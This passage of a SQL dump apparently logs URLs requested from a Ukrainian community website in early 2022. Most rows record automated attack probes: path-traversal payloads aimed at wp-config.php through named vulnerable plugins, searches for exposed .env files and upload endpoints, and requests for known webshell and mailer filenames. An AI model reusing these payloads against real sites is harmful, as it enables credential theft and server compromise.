00:00:00',301),(36737,'https://malehus.in.ua/elfinder/php/connector.minimal.php',NULL,'','',2,0,'2022-01-26 19:51:12','0000-00-00 00:00:00',301),(36738,'https://malehus.in.ua/components/com_acym/controllers/index.html',NULL,'','',2,0,'2022-01-27 07:03:53','0000-00-00 00:00:00',301),(36739,'https://malehus.in.ua/elfinder/php/connector.php',NULL,'','',3,0,'2022-01-27 07:24:05','0000-00-00 00:00:00',301),(36740,'https://malehus.in.ua/admin/elfinder/php/connector.php',NULL,'','',2,0,'2022-01-27 09:18:32','0000-00-00 00:00:00',301),(36741,'https://malehus.in.ua/admin/elfinder/php/connector.minimal.php',NULL,'','',3,0,'2022-01-27 11:33:42','0000-00-00 00:00:00',301),(36742,'https://malehus.in.ua/filemanager/dialog.php',NULL,'','',2,0,'2022-01-29 09:10:44','0000-00-00 00:00:00',301),(36743,'https://malehus.in.ua/wezom/media/js/tinymce/filemanager/dialog.php',NULL,'','',1,0,'2022-01-29 10:34:27','0000-00-00 00:00:00',301),(36744,'https://malehus.in.ua/laravel/.env',NULL,'','',64,0,'2022-01-30 02:30:36','0000-00-00 00:00:00',301),(36745,'https://malehus.in.ua/local/.env',NULL,'','',55,0,'2022-01-30 02:30:37','0000-00-00 00:00:00',301),(36746,'https://malehus.in.ua/backend/.env',NULL,'','',56,0,'2022-01-30 02:30:39','0000-00-00 00:00:00',301),(36747,'https://malehus.in.ua/application/config/sms_settings.php',NULL,'','',30,0,'2022-01-30 02:30:41','0000-00-00 00:00:00',301),(36748,'https://malehus.in.ua/application/config/s3.php',NULL,'','',30,0,'2022-01-30 02:30:42','0000-00-00 00:00:00',301),(36749,'https://malehus.in.ua/protected/.env',NULL,'','',50,0,'2022-01-30 02:30:44','0000-00-00 00:00:00',301),(36750,'https://malehus.in.ua/database/.env',NULL,'','',33,0,'2022-01-30 02:30:45','0000-00-00 00:00:00',301),(36751,'https://malehus.in.ua/app/config/.env',NULL,'','',29,0,'2022-01-30 02:30:48','0000-00-00 00:00:00',301),(36752,'https://malehus.in.ua/admin/filemanager/dialog.php',NULL,'','',1,0,'2022-01-31 14:48:04','0000-00-00 00:00:00',301),(36753,'https://malehus.in.ua/tinymce/filemanager/dialog.php',NULL,'','',1,0,'2022-01-31 16:20:54','0000-00-00 00:00:00',301),(36754,'https://malehus.in.ua/js/filemanager/dialog.php',NULL,'','',1,0,'2022-01-31 17:50:14','0000-00-00 00:00:00',301),(36755,'https://malehus.in.ua/elfinder/elfinder.html',NULL,'','',2,0,'2022-02-01 10:51:45','0000-00-00 00:00:00',301),(36756,'https://malehus.in.ua/bigdump.php',NULL,'','',1,0,'2022-02-01 16:29:27','0000-00-00 00:00:00',301),(36757,'https://malehus.in.ua/blog/wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:11','0000-00-00 00:00:00',301),(36758,'https://malehus.in.ua/blog/wp-config.txt',NULL,'','',1,0,'2022-02-02 08:40:12','0000-00-00 00:00:00',301),(36759,'https://malehus.in.ua/blog/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:12','0000-00-00 00:00:00',301),(36760,'https://malehus.in.ua/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:13','0000-00-00 00:00:00',301),(36761,'https://malehus.in.ua/blog/wp-admin/admin-ajax.php?action=ave_publishpost&title=random&short=1&term=1&thumb=../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:14','0000-00-00 00:00:00',301),(36762,'https://malehus.in.ua/blog/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:15','0000-00-00 00:00:00',301),(36763,'https://malehus.in.ua/blog/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:15','0000-00-00 00:00:00',301),(36764,'https://malehus.in.ua/blog/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2022-02-02 08:40:16','0000-00-00 00:00:00',301),(36765,'https://malehus.in.ua/blog/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:17','0000-00-00 00:00:00',301),(36766,'https://malehus.in.ua/blog/wp-content/force-download.php?file=../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:18','0000-00-00 00:00:00',301),(36767,'https://malehus.in.ua/blog/force-download.php?file=wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:19','0000-00-00 00:00:00',301),(36768,'https://malehus.in.ua/blog/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:19','0000-00-00 00:00:00',301),(36769,'https://malehus.in.ua/blog/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:20','0000-00-00 00:00:00',301),(36770,'https://malehus.in.ua/blog/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:21','0000-00-00 00:00:00',301),(36771,'https://malehus.in.ua/blog/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:22','0000-00-00 00:00:00',301),(36772,'https://malehus.in.ua/blog/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mypath=../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:23','0000-00-00 00:00:00',301),(36773,'https://malehus.in.ua/blog/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:23','0000-00-00 00:00:00',301),(36774,'https://malehus.in.ua/blog/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:24','0000-00-00 00:00:00',301),(36775,'https://malehus.in.ua/blog/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:25','0000-00-00 00:00:00',301),(36776,'https://malehus.in.ua/blog/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:26','0000-00-00 00:00:00',301),(36777,'https://malehus.in.ua/blog/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:27','0000-00-00 00:00:00',301),(36778,'https://malehus.in.ua/blog/wp-content/themes/nativechurch/download/download.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:27','0000-00-00 00:00:00',301),(36779,'https://malehus.in.ua/blog/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadattachment.php?path=../../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:28','0000-00-00 00:00:00',301),(36780,'https://malehus.in.ua/blog/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:29','0000-00-00 00:00:00',301),(36781,'https://malehus.in.ua/blog/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:30','0000-00-00 00:00:00',301),(36782,'https://malehus.in.ua/blog/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:31','0000-00-00 00:00:00',301),(36783,'https://malehus.in.ua/blog/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download',NULL,'','',1,0,'2022-02-02 08:40:31','0000-00-00 00:00:00',301),(36784,'https://malehus.in.ua/blog/wp-content/themes/fiestaresidences/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:32','0000-00-00 00:00:00',301),(36785,'https://malehus.in.ua/blog/wp-content/themes/erinvale/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:33','0000-00-00 00:00:00',301),(36786,'https://malehus.in.ua/blog/wp-content/themes/hsv/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:34','0000-00-00 00:00:00',301),(36787,'https://malehus.in.ua/blog/wp-content/themes/optimus/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:35','0000-00-00 00:00:00',301),(36788,'https://malehus.in.ua/blog/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:35','0000-00-00 00:00:00',301),(36789,'https://malehus.in.ua/blog/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php',NULL,'','',1,0,'2022-02-02 08:40:36','0000-00-00 00:00:00',301),(36790,'https://malehus.in.ua/elfinder/connectors/php/connector.php',NULL,'','',2,0,'2022-02-03 00:09:03','0000-00-00 00:00:00',301),(36791,'https://malehus.in.ua/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-03 09:25:50','0000-00-00 00:00:00',301),(36792,'https://malehus.in.ua/tinymce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-03 11:46:02','0000-00-00 00:00:00',301),(36793,'https://malehus.in.ua/admin/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-03 15:24:40','0000-00-00 00:00:00',301),(36794,'https://malehus.in.ua/admin/tinymce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-03 16:50:59','0000-00-00 00:00:00',301),(36795,'https://malehus.in.ua/js/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-03 18:32:49','0000-00-00 00:00:00',301),(36796,'https://malehus.in.ua/js/tinymce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-03 20:07:10','0000-00-00 00:00:00',301),(36797,'https://malehus.in.ua/jscripts/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-04 06:53:31','0000-00-00 00:00:00',301),(36798,'https://malehus.in.ua/jscripts/tinymce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-04 08:01:22','0000-00-00 00:00:00',301),(36799,'https://malehus.in.ua/admin/js/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-04 09:21:33','0000-00-00 00:00:00',301),(36800,'https://malehus.in.ua/app/webroot/js/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-04 10:30:32','0000-00-00 00:00:00',301),(36801,'https://malehus.in.ua/admin/jscripts/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2022-02-04 11:37:06','0000-00-00 00:00:00',301),(36802,'https://malehus.in.ua/elfinder/src/connectors/php/connector.php',NULL,'','',2,0,'2022-02-04 13:46:22','0000-00-00 00:00:00',301),(36803,'https://malehus.in.ua/admin/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-02-06 07:15:38','0000-00-00 00:00:00',301),(36804,'https://malehus.in.ua/adminshell/dialogs/uploadfile.php',NULL,'','',1,0,'2022-02-06 08:12:42','0000-00-00 00:00:00',301),(36805,'https://malehus.in.ua/admin/dialogs/uploadfile.php',NULL,'','',1,0,'2022-02-06 10:01:22','0000-00-00 00:00:00',301),(36806,'https://malehus.in.ua/ckeditor/connectors/php/connector.php',NULL,'','',1,0,'2022-02-07 16:03:11','0000-00-00 00:00:00',301),(36807,'https://malehus.in.ua/admin/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-02-09 08:29:36','0000-00-00 00:00:00',301),(36808,'https://malehus.in.ua/admin/assets/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-02-10 19:00:47','0000-00-00 00:00:00',301),(36809,'https://malehus.in.ua/admin/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-02-12 15:12:34','0000-00-00 00:00:00',301),(36810,'https://malehus.in.ua/holuby/poshtovi/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',4,0,'2022-02-13 13:43:37','0000-00-00 00:00:00',301),(36811,'https://malehus.in.ua/public/admin/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-02-14 06:13:25','0000-00-00 00:00:00',301),(36812,'https://malehus.in.ua/assets/admin/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-09 05:48:40','0000-00-00 00:00:00',301),(36813,'https://malehus.in.ua/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-10 14:59:00','0000-00-00 00:00:00',301),(36814,'https://malehus.in.ua/env.bak',NULL,'','',19,0,'2022-03-13 09:07:55','0000-00-00 00:00:00',301),(36815,'https://malehus.in.ua/admin/.env',NULL,'','',23,0,'2022-03-13 09:08:00','0000-00-00 00:00:00',301),(36816,'https://malehus.in.ua/src/.env',NULL,'','',19,0,'2022-03-13 09:08:03','0000-00-00 00:00:00',301),(36817,'https://malehus.in.ua/apps/.env',NULL,'','',19,0,'2022-03-13 09:08:14','0000-00-00 00:00:00',301),(36818,'https://malehus.in.ua/blog/.env',NULL,'','',20,0,'2022-03-13 09:08:18','0000-00-00 00:00:00',301),(36819,'https://malehus.in.ua/www/.env',NULL,'','',19,0,'2022-03-13 09:08:19','0000-00-00 00:00:00',301),(36820,'https://malehus.in.ua/crm/.env',NULL,'','',21,0,'2022-03-13 09:08:21','0000-00-00 00:00:00',301),(36821,'https://malehus.in.ua/blog/wp-includes/wlwmanifest.xml',NULL,'','',79,0,'2022-03-13 14:39:07','0000-00-00 00:00:00',301),(36822,'https://malehus.in.ua/website/wp-includes/wlwmanifest.xml',NULL,'','',66,0,'2022-03-13 14:39:09','0000-00-00 00:00:00',301),(36823,'https://malehus.in.ua/2019/wp-includes/wlwmanifest.xml',NULL,'','',81,0,'2022-03-13 14:39:11','0000-00-00 00:00:00',301),(36824,'https://malehus.in.ua/test/wp-includes/wlwmanifest.xml',NULL,'','',81,0,'2022-03-13 14:39:12','0000-00-00 00:00:00',301),(36825,'https://malehus.in.ua/wp2/wp-includes/wlwmanifest.xml',NULL,'','',69,0,'2022-03-13 14:39:13','0000-00-00 00:00:00',301),(36826,'https://malehus.in.ua/site/wp-includes/wlwmanifest.xml',NULL,'','',82,0,'2022-03-13 14:39:14','0000-00-00 00:00:00',301),(36827,'https://malehus.in.ua/cms/wp-includes/wlwmanifest.xml',NULL,'','',81,0,'2022-03-13 14:39:15','0000-00-00 00:00:00',301),(36828,'https://malehus.in.ua/8-novini-2/2544-kilka-pitan-shchodo-nichnogo-tarifu-na-elektroenergiyu',NULL,'','',5,0,'2022-03-14 13:01:03','0000-00-00 00:00:00',301),(36829,'https://malehus.in.ua/web/wp-includes/wlwmanifest.xml',NULL,'','',81,0,'2022-03-15 06:09:40','0000-00-00 00:00:00',301),(36830,'https://malehus.in.ua/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',81,0,'2022-03-15 06:09:40','0000-00-00 00:00:00',301),(36831,'https://malehus.in.ua/wp/wp-includes/wlwmanifest.xml',NULL,'','',80,0,'2022-03-15 06:09:41','0000-00-00 00:00:00',301),(36832,'https://malehus.in.ua/news/wp-includes/wlwmanifest.xml',NULL,'','',66,0,'2022-03-15 06:09:41','0000-00-00 00:00:00',301),(36833,'https://malehus.in.ua/2018/wp-includes/wlwmanifest.xml',NULL,'','',22,0,'2022-03-15 06:09:41','0000-00-00 00:00:00',301),(36834,'https://malehus.in.ua/shop/wp-includes/wlwmanifest.xml',NULL,'','',79,0,'2022-03-15 06:09:42','0000-00-00 00:00:00',301),(36835,'https://malehus.in.ua/wp1/wp-includes/wlwmanifest.xml',NULL,'','',80,0,'2022-03-15 06:09:42','0000-00-00 00:00:00',301),(36836,'https://malehus.in.ua/media/wp-includes/wlwmanifest.xml',NULL,'','',22,0,'2022-03-15 06:09:43','0000-00-00 00:00:00',301),(36837,'https://malehus.in.ua/sito/wp-includes/wlwmanifest.xml',NULL,'','',64,0,'2022-03-15 06:09:44','0000-00-00 00:00:00',301),(36838,'https://malehus.in.ua/radio.php',NULL,'','',33,0,'2022-03-15 23:40:31','0000-00-00 00:00:00',301),(36839,'https://malehus.in.ua/wp-load.php',NULL,'www.bing.com','',21,0,'2022-03-16 08:20:31','0000-00-00 00:00:00',301),(36840,'https://malehus.in.ua/wp-admin/style.php',NULL,'www.bing.com','',26,0,'2022-03-16 08:20:36','0000-00-00 00:00:00',301),(36841,'https://malehus.in.ua/s_e.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:20:47','0000-00-00 00:00:00',301),(36842,'https://malehus.in.ua/s_ne.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:21:19','0000-00-00 00:00:00',301),(36843,'https://malehus.in.ua/1index.php',NULL,'www.bing.com','',36,0,'2022-03-16 08:21:26','0000-00-00 00:00:00',301),(36844,'https://malehus.in.ua/3index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',1,0,'2022-03-16 08:21:29','0000-00-00 00:00:00',301),(36845,'https://malehus.in.ua/wikindex.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',1,0,'2022-03-16 08:21:50','0000-00-00 00:00:00',301),(36846,'https://malehus.in.ua/wp-content/mu-plugins-old/index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',4,0,'2022-03-16 08:21:52','0000-00-00 00:00:00',301),(36847,'https://malehus.in.ua/lock360.php?daksldlkdsadas=1',NULL,'www.bing.com','',4,0,'2022-03-16 08:22:41','0000-00-00 00:00:00',301),(36848,'https://malehus.in.ua/xmrlpc.php?daksldlkdsadas=1',NULL,'www.bing.com','',4,0,'2022-03-16 08:23:33','0000-00-00 00:00:00',301),(36849,'https://malehus.in.ua/xmlrpcs.php?daksldlkdsadas=1',NULL,'www.bing.com','',4,0,'2022-03-16 08:23:45','0000-00-00 00:00:00',301),(36850,'https://malehus.in.ua/wp-admin.php?daksldlkdsadas=1',NULL,'www.bing.com','',1,0,'2022-03-16 08:23:51','0000-00-00 00:00:00',301),(36851,'https://malehus.in.ua/qindex.php?daksldlkdsadas=1',NULL,'www.bing.com','',1,0,'2022-03-16 08:24:53','0000-00-00 00:00:00',301),(36852,'https://malehus.in.ua/wp_wrong_datlib.php',NULL,'www.bing.com','',29,0,'2022-03-16 08:26:11','0000-00-00 00:00:00',301),(36853,'https://malehus.in.ua/beence.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:26:18','0000-00-00 00:00:00',301),(36854,'https://malehus.in.ua/wp-signin.php?dizo&ping',NULL,'www.bing.com','',9,0,'2022-03-16 08:27:09','0000-00-00 00:00:00',301),(36855,'https://malehus.in.ua/media-admin.php',NULL,'www.bing.com','',20,0,'2022-03-16 08:27:30','0000-00-00 00:00:00',301),(36856,'https://malehus.in.ua/export.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:28:09','0000-00-00 00:00:00',301),(36857,'https://malehus.in.ua/wp-content/export.php',NULL,'www.bing.com','',20,0,'2022-03-16 08:28:09','0000-00-00 00:00:00',301),(36858,'https://malehus.in.ua/wp-includes/wp-class.php',NULL,'www.bing.com','',30,0,'2022-03-16 08:28:29','0000-00-00 00:00:00',301),(36859,'https://malehus.in.ua/wp-includes/wp-atom.php',NULL,'www.bing.com','',16,0,'2022-03-16 08:28:40','0000-00-00 00:00:00',301),(36860,'https://malehus.in.ua/wp-includes/images/css.php',NULL,'www.bing.com','',16,0,'2022-03-16 08:29:24','0000-00-00 00:00:00',301),(36861,'https://malehus.in.ua/defau1t.php',NULL,'www.bing.com','',23,0,'2022-03-16 08:30:31','0000-00-00 00:00:00',301),(36862,'https://malehus.in.ua/css.php',NULL,'www.bing.com','',8,0,'2022-03-16 08:31:20','0000-00-00 00:00:00',301),(36863,'https://malehus.in.ua/wp-plugins.php',NULL,'www.bing.com','',18,0,'2022-03-16 08:33:57','0000-00-00 00:00:00',301),(36864,'https://malehus.in.ua/gank.php.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:34:00','0000-00-00 00:00:00',301),(36865,'https://malehus.in.ua/wp-content/db-cache.php',NULL,'www.bing.com','',16,0,'2022-03-16 08:34:44','0000-00-00 00:00:00',301),(36866,'https://malehus.in.ua/archives.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:35:26','0000-00-00 00:00:00',301),(36867,'https://malehus.in.ua/xindex.php',NULL,'www.bing.com','',6,0,'2022-03-16 08:36:33','0000-00-00 00:00:00',301),(36868,'https://malehus.in.ua/defau11.php',NULL,'www.bing.com','',20,0,'2022-03-16 08:36:48','0000-00-00 00:00:00',301),(36869,'https://malehus.in.ua/wp-content/outcms.php?up',NULL,'www.bing.com','',16,0,'2022-03-16 08:36:59','0000-00-00 00:00:00',301),(36870,'https://malehus.in.ua/system_log.php?bala=up',NULL,'www.bing.com','',11,0,'2022-03-16 08:37:18','0000-00-00 00:00:00',301),(36871,'https://malehus.in.ua/wp-backup-sql-302.php',NULL,'www.bing.com','',16,0,'2022-03-16 08:37:33','0000-00-00 00:00:00',301),(36872,'https://malehus.in.ua/error.php?phpshells',NULL,'www.bing.com','',8,0,'2022-03-16 08:37:54','0000-00-00 00:00:00',301),(36873,'https://malehus.in.ua/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:17','0000-00-00 00:00:00',301),(36874,'https://malehus.in.ua/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:18','0000-00-00 00:00:00',301),(36875,'https://malehus.in.ua/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:20','0000-00-00 00:00:00',301),(36876,'https://malehus.in.ua/wp-content/uploads/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:24','0000-00-00 00:00:00',301),(36877,'https://malehus.in.ua/wp-content/uploads/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:25','0000-00-00 00:00:00',301),(36878,'https://malehus.in.ua/wp-content/uploads/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:27','0000-00-00 00:00:00',301),(36879,'https://malehus.in.ua/wp-includes/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:28','0000-00-00 00:00:00',301),(36880,'https://malehus.in.ua/wp-includes/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:29','0000-00-00 00:00:00',301),(36881,'https://malehus.in.ua/wp-includes/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:31','0000-00-00 00:00:00',301),(36882,'https://malehus.in.ua/wp-admin/alfa_data',NULL,'www.bing.com','',15,0,'2022-03-16 08:38:32','0000-00-00 00:00:00',301),(36883,'https://malehus.in.ua/wp-admin/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:35','0000-00-00 00:00:00',301),(36884,'https://malehus.in.ua/wp-admin/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:36','0000-00-00 00:00:00',301),(36885,'https://malehus.in.ua/wp-content/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:37','0000-00-00 00:00:00',301),(36886,'https://malehus.in.ua/wp-content/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:38','0000-00-00 00:00:00',301),(36887,'https://malehus.in.ua/wp-content/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:39','0000-00-00 00:00:00',301),(36888,'https://malehus.in.ua/templates/beez3/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:41','0000-00-00 00:00:00',301),(36889,'https://malehus.in.ua/templates/beez3/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:42','0000-00-00 00:00:00',301),(36890,'https://malehus.in.ua/templates/beez3/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:44','0000-00-00 00:00:00',301),(36891,'https://malehus.in.ua/sites/default/files/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:45','0000-00-00 00:00:00',301),(36892,'https://malehus.in.ua/sites/default/files/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:46','0000-00-00 00:00:00',301),(36893,'https://malehus.in.ua/sites/default/files/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:47','0000-00-00 00:00:00',301),(36894,'https://malehus.in.ua/admin/controller/extension/extension/alfa_data',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:49','0000-00-00 00:00:00',301),(36895,'https://malehus.in.ua/admin/controller/extension/extension/alfacgiapi',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:50','0000-00-00 00:00:00',301),(36896,'https://malehus.in.ua/admin/controller/extension/extension/cgialfa',NULL,'www.bing.com','',16,0,'2022-03-16 08:38:51','0000-00-00 00:00:00',301),(36897,'https://malehus.in.ua/olux.php',NULL,'www.bing.com','',22,0,'2022-03-16 08:39:27','0000-00-00 00:00:00',301),(36898,'https://malehus.in.ua/xleet.php',NULL,'www.bing.com','',33,0,'2022-03-16 08:39:27','0000-00-00 00:00:00',301),(36899,'https://malehus.in.ua/wso.php',NULL,'www.bing.com','',48,0,'2022-03-16 08:39:27','0000-00-00 00:00:00',301),(36900,'https://malehus.in.ua/1.php',NULL,'www.bing.com','',29,0,'2022-03-16 08:39:29','0000-00-00 00:00:00',301),(36901,'https://malehus.in.ua/x.php',NULL,'www.bing.com','',32,0,'2022-03-16 08:39:30','0000-00-00 00:00:00',301),(36902,'https://malehus.in.ua/z.php',NULL,'www.bing.com','',27,0,'2022-03-16 08:39:30','0000-00-00 00:00:00',301),(36903,'https://malehus.in.ua/a.php',NULL,'www.bing.com','',27,0,'2022-03-16 08:39:30','0000-00-00 00:00:00',301),(36904,'https://malehus.in.ua/test.php',NULL,'www.bing.com','',20,0,'2022-03-16 08:39:31','0000-00-00 00:00:00',301),(36905,'https://malehus.in.ua/wp.php',NULL,'www.bing.com','',29,0,'2022-03-16 08:39:31','0000-00-00 00:00:00',301),(36906,'https://malehus.in.ua/templates/beez3/index.php',NULL,'www.bing.com','',17,0,'2022-03-16 08:39:33','0000-00-00 00:00:00',301),(36907,'https://malehus.in.ua/2020/wp-includes/wlwmanifest.xml',NULL,'','',58,0,'2022-03-16 20:54:54','0000-00-00 00:00:00',301),(36908,'https://malehus.in.ua/2021/wp-includes/wlwmanifest.xml',NULL,'','',15,0,'2022-03-16 20:55:02','0000-00-00 00:00:00',301),(36909,'https://malehus.in.ua/installer.php',NULL,'','',7,0,'2022-03-16 22:08:57','0000-00-00 00:00:00',301),(36910,'https://malehus.in.ua/assets/js/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-17 00:07:16','0000-00-00 00:00:00',301),(36911,'https://malehus.in.ua/home',NULL,'http://www.malehus.in.ua/home','',18,0,'2022-03-17 21:23:11','0000-00-00 00:00:00',301),(36912,'https://malehus.in.ua/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-18 15:11:15','0000-00-00 00:00:00',301),(36913,'https://www.malehus.in.ua/holuby/kinhy/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',3,0,'2022-03-19 15:34:00','0000-00-00 00:00:00',301),(36914,'https://malehus.in.ua/assets/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-03-20 00:18:11','0000-00-00 00:00:00',301),(36915,'https://malehus.in.ua/srx.php',NULL,'https://www.google.com','',3,0,'2022-03-20 03:34:01','0000-00-00 00:00:00',301),(36916,'https://malehus.in.ua/1337.php',NULL,'https://www.google.com','',14,0,'2022-03-20 03:34:02','0000-00-00 00:00:00',301),(36917,'https://malehus.in.ua/xx.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:04','0000-00-00 00:00:00',301),(36918,'https://malehus.in.ua/xxx.php',NULL,'https://www.google.com','',18,0,'2022-03-20 03:34:04','0000-00-00 00:00:00',301),(36919,'https://malehus.in.ua/leaf.php',NULL,'https://www.google.com','',12,0,'2022-03-20 03:34:05','0000-00-00 00:00:00',301),(36920,'https://malehus.in.ua/leafmailer2.8.php',NULL,'https://www.google.com','',5,0,'2022-03-20 03:34:05','0000-00-00 00:00:00',301),(36921,'https://malehus.in.ua/lf.php',NULL,'https://www.google.com','',5,0,'2022-03-20 03:34:06','0000-00-00 00:00:00',301),(36922,'https://malehus.in.ua/alex.php',NULL,'https://www.google.com','',5,0,'2022-03-20 03:34:07','0000-00-00 00:00:00',301),(36923,'https://malehus.in.ua/new.php',NULL,'https://www.google.com','',13,0,'2022-03-20 03:34:07','0000-00-00 00:00:00',301),(36924,'https://malehus.in.ua/mailer.php',NULL,'https://www.google.com','',6,0,'2022-03-20 03:34:08','0000-00-00 00:00:00',301),(36925,'https://malehus.in.ua/marijuana.php',NULL,'https://www.google.com','',14,0,'2022-03-20 03:34:08','0000-00-00 00:00:00',301),(36926,'https://malehus.in.ua/gaza.php',NULL,'https://www.google.com','',2,0,'2022-03-20 03:34:09','0000-00-00 00:00:00',301),(36927,'https://malehus.in.ua/wp-admin.php',NULL,'https://www.google.com','',16,0,'2022-03-20 03:34:10','0000-00-00 